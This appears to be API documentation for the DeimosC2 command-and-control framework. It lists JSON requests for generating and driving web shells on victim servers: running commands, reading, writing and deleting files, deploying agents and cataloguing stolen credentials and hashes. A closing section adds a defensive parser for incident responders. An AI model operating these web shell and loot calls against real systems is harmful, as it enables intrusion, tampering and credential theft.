API Examples
DeimosC2 leverages API calls over websockets for the frontend to interact with the backend. This allows for flexibility of the server and seamless interaction. Why over websockets you ask? Because it is 2020 and technology evolves!
The following is a list of the APIs in their entirety. They will also be broken down into each individual section of the Wiki.
Generate web shell
{
"Type": "WebShell",
"FunctionName": "GenerateShell",
"Data": {"type":"aspx"}
}
Initialize Web Shell after placing it on victim server
{
"Type": "WebShell",
"FunctionName": "Init",
"Data": {"URL":"http://10.30.10.138/jomfwujVVhOoiFGVNroGeMWun.aspx", "AuthToken":"4763c98e-cf19-4bd4-abdd-59e18de60329"}
}
Execute a CMD (or shell) command through the web shell
{
"Type": "WebShell",
"FunctionName": "ExecuteCommand",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["cmd","whoami"]}
}
Execute a PowerShell command through a web shell (if Windows)
{
"Type": "WebShell",
"FunctionName": "ExecuteCommand",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["power","whoami"]}
}
Browse the victim's file system through the web shell
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\"]}
}
Remove files or directories (if empty) through the file browser
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\foo\\woot.txt", "remove"]}
}
Download files through the file browser
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\foo\\woot.txt", "download"]}
}
Make a directory through the file browser
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\foo\\woot\\", "mkdir"]}
}
Read files on the victim server through the web shell
{
"Type": "WebShell",
"FunctionName": "FileEditor",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:/inetpub/wwwroot/shells/boo.txt", "read", ""]}
}
Write to files on the victim server through the web shell
{
"Type": "WebShell",
"FunctionName": "FileEditor",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:/inetpub/wwwroot/shells/boo.txt", "write", "woot"]}
}
Upload File through web shell
{
"Type":"WebShell",
"FunctionName":"FileUpload",
"Data":{"UUID":"d38ced43-ed13-4e06-8daf-366158d49355","Options":["test_upload.txt","C:\\test\\","PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo="]}
}
Delete WebShell
{
"Type": "WebShell",
"FunctionName": "DeleteShell",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329"}
}
Upload an Agent to the WebShell and delete webshell
{
"Type": "WebShell",
"FunctionName": "DeployAgent",
"Data":{"UUID":"d38ced43-ed13-4e06-8daf-366158d49355","Options":["TCP_Agent.exe","C:\\test\\","<b64 data of agent bytes>"]}
}
List Web Shells
{
"Type": "WebShell",
"FunctionName": "List",
"Data": {}
}
Add user through Admin API
{
"Type": "Admin",
"FunctionName": "AddUser",
"Data": {"Options":["lowprivuser","mypassword","0"]}
}
Edit user password or username through the API
{
"Type": "Admin",
"FunctionName": "EditUser",
"Data": {"UserID":"48cc33bb-558a-421d-81cd-896366c55323", "username":"", "password":"","admin":"1"}
}
Delete user through the Admin API
{
"Type": "Admin",
"FunctionName": "DeleteUser",
"Data": {"Options":["61c9dbf1-efd7-44a8-9f8b-8db803f51aa6"]}
}
Set MFA and Password Length in App Settings through Admin API
{
"Type": "Admin",
"FunctionName": "AppSettings",
"Data": {"Options":["true", "16"]}
}
List App Settings
{
"Type": "Admin",
"FunctionName": "ListAppSettings",
"Data": {}
}
List all active users
{
"Type": "Admin",
"FunctionName": "ListUsers",
"Data": {}
}
Force a reset of a user's password and/or MFA using the user's UUID
{
"Type": "Admin",
"FunctionName": "ResetUser",
"Data": {"Options":["fdbc8f50-71e6-443a-ac6d-889fa262f3a6"]}
}
List Backup Schedule
{
"Type": "Admin",
"FunctionName": "ListBackupSchedule",
"Data": {}
}
List all Loot
{
"Type": "Loot",
"FunctionName": "List",
"Data": {}
}
List loot based on agent
{
"Type": "Loot",
"FunctionName": "ListAgentLoot",
"Data": {"agentName": "61c9dbf1-efd7-44a8-9f8b-8db803f51aa6"}
}
Add password in Loot based on hash (EditPass)
{
"Type": "Loot",
"FunctionName": "EditPass",
"Data": {"password": "supersecret", "hash": "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"}
}
Add loot manually
{
"Type": "Loot",
"FunctionName": "Add",
"Data": {"agentName": "f8f2a1c4-1922-43c1-9709-5573f5cceadd", "userName": "blah", "password": "blah", "hash": "blah", "credtype": "blah", "host": "blah", "domain": "blah", "webshell": false}
}
List LootFiles (agentname and other directories under /looted/ are passed to variable path)
{
"Type": "Loot",
"FunctionName": "ListLootFiles",
"Data": {"path":""}
}
Get a backup of logs, C2 Database, looted data, and web server certs and keys
{
"Type": "Archive",
"FunctionName": "Backup",
"Data": {"Backup":true}
}
Make a backup of the same files, but shut down the campaign/webserver and delete the files from the C2 instance
{
"Type": "Archive",
"FunctionName": "EndGame",
"Data": {"Backup":false}
}
Schedule backups to occur
{
"Type": "Archive",
"FunctionName": "SetSchedule",
"Data": {"Status": true, "Hour":"15:26", "Days":["Thursday"]}
}
Get the list of binaries and the go file for that listener
{
"Type": "Listener",
"FunctionName": "GetCompiled",
"Data": {"Key":"1c6059b4-61ae-4844-a67c-f68b61fef727"}
}
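For incident responders reviewing captured frontend-to-backend messages, the envelope above (Type, FunctionName, Data) can be parsed into a timeline of what touched the victim host. This is an added example, not DeimosC2 code; the function names, the "browse" label and the sample capture are assumptions made here, and the Options positions are taken from the examples on this page.

```python
import base64, hashlib, json

def summarize(frame):
    """Describe one captured API message; None if it is not a valid envelope."""
    try:
        msg = json.loads(frame)
    except json.JSONDecodeError:
        return None
    if not isinstance(msg, dict) or not {"Type", "FunctionName", "Data"} <= set(msg):
        return None
    data = msg["Data"] if isinstance(msg["Data"], dict) else {}
    opts = data.get("Options")
    if not isinstance(opts, list) or not all(isinstance(o, str) for o in opts):
        opts = []
    fn = msg["FunctionName"]
    out = {"type": msg["Type"], "function": fn, "shell": data.get("UUID")}
    if msg["Type"] != "WebShell":
        return out
    # Option positions below follow the examples on this page.
    if fn == "Init":
        out["url"] = data.get("URL")
    elif fn == "ExecuteCommand" and len(opts) == 2:
        out["interpreter"], out["command"] = opts
    elif fn in ("FileBrowser", "FileEditor") and opts:
        out["path"] = opts[0]
        out["action"] = opts[1] if len(opts) > 1 else "browse"  # label chosen here
    elif fn in ("FileUpload", "DeployAgent") and len(opts) == 3:
        name, directory, b64 = opts
        out["path"] = directory + name
        try:  # hash the decoded payload so it can be matched against files on disk
            blob = base64.b64decode(b64, validate=True)
            out["size"], out["sha256"] = len(blob), hashlib.sha256(blob).hexdigest()
        except ValueError:
            out["size"], out["sha256"] = None, None
    return out

def timeline(frames):
    """Summaries of every well-formed message, in capture order."""
    return [s for s in map(summarize, frames) if s is not None]

# Constructed sample capture (all values are made up for this example).
PAYLOAD = b"constructed sample\n"
SHELL = "00000000-0000-0000-0000-000000000000"
SAMPLE = [
    json.dumps({"Type": "WebShell", "FunctionName": "ExecuteCommand",
                "Data": {"UUID": SHELL, "Options": ["cmd", "whoami"]}}),
    json.dumps({"Type": "WebShell", "FunctionName": "FileUpload", "Data": {"UUID": SHELL,
                "Options": ["note.txt", "C:\\test\\", base64.b64encode(PAYLOAD).decode()]}}),
    '{"Type":"WebShell","FunctionName":"List","Data":{}}"',  # stray quote: rejected
    json.dumps({"Type": "Admin", "FunctionName": "ListUsers", "Data": {}}),
]
```

Calling `timeline(SAMPLE)` returns three entries; the frame with the trailing quote is dropped because it is not valid JSON.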